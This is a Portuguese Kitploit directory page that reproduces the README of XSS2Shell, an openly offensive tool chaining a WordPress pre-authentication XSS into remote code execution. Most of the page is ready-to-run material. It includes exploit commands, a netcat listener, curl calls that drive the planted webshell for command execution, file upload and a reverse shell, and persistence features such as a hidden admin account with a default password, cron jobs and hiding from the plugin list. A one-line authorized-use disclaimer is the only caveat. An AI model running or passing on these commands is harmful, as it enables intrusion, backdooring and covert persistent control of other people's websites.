Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
XSS2Shell — Explora XSS pré-autenticação do WordPress (CVE-2026-64638) para obter execução remota de código, instalando uma webshell backdoor criptografada com AES com persistência, upload de arquivos, reverse shell e opções de furtividade para engajamentos autorizados de red team. | Kitploit
Ferramentas/GitHubGitHub/g0d150ne/xss2shell
Mecanismos de PersistênciaExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubg0d150ne/xss2shell

XSS2Shell

Explora XSS pré-autenticação do WordPress (CVE-2026-64638) para obter execução remota de código, instalando uma webshell backdoor criptografada com AES com persistência, upload de arquivos, reverse shell e opções de furtividade para engajamentos autorizados de red team.

2117há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

XSS2Shell ULTIMATE v3.0

Exploit de Cadeia XSS Pré-Auth → RCE no WordPress
Desenvolvido por G0D150NE

📌 Recursos

  • 🔍 Detecção automática de XSS e versão do WordPress
  • 🎯 3 Modos: Auto, XSS, Direto
  • 📡 Servidor de callback para capturar credenciais
  • 🐚 WebShell com múltiplos métodos de execução
  • 🔄 Persistência (cron job, admin oculto, auto-replicação)
  • 📁 Upload/download de arquivos
  • 🖥️ Reverse shell com um clique
  • 🛡️ Modo furtivo (ocultar da lista de plugins)
  • 🔐 Backdoor criptografado com AES-256

📦 Instalação

# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 Início Rápido

1. Configurar o Listener

# Open terminal for reverse shell
nc -lvnp 4444

2. Executar o Exploit

Modo Auto (Recomendado)

python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

Modo XSS (Sem Credenciais)

python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Modo Direto (Com Credenciais)

python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Execução de Comandos

Após o webshell instalado:

# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Exemplos de Uso

# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Opções de Comando

OpçãoDescriçãoPadrão
targetURL do WordPress alvoObrigatório
-u, --usernameNome de usuário admin do WordPress-
-p, --wp-passSenha do admin do WordPress-
--lhostEndereço IP do listener127.0.0.1
--lportPorta do listener4444
--modeModo de exploração (auto/xss/direct)auto
--slugNome do slug do pluging0d150ne
--callback-portPorta do servidor de callback9090
--backdoor-passSenha do backdoorG0D150NE

🐚 Recursos do WebShell

Após exploração bem-sucedida:

RecursoComando
Executar Comando?b2h=BASE64_CMD
Upload de Arquivo-F '[email protected]'
Reverse Shell?rev=1
Comando Simples?cmd=id
Backdoor Criptografado?decrypt=AES_DATA

Admin Oculto Criado:

  • Usuário: sysadmin_{slug}
  • Senha: {backdoor-pass} (padrão: G0D150NE)

📸 Exemplo de Saída

╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Solução de Problemas

ProblemaSolução
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Conexão recusadaVerifique o listener: nc -lvnp 4444
Falha no loginVerifique as credenciais ou use o modo XSS
Falha no upload do pluginVerifique as permissões, use um slug diferente
Conflito de argumentosUse -p para wp-pass, --backdoor-pass para o backdoor

⚠️ Aviso Legal

Somente para fins educacionais e testes autorizados.
Use apenas em sistemas que você possui ou com permissão explícita para testar.
O autor não é responsável por qualquer uso indevido ou dano.

📞 Contato

  • Autor: G0D150NE
  • CVE: CVE-2026-64638
Baixar ferramenta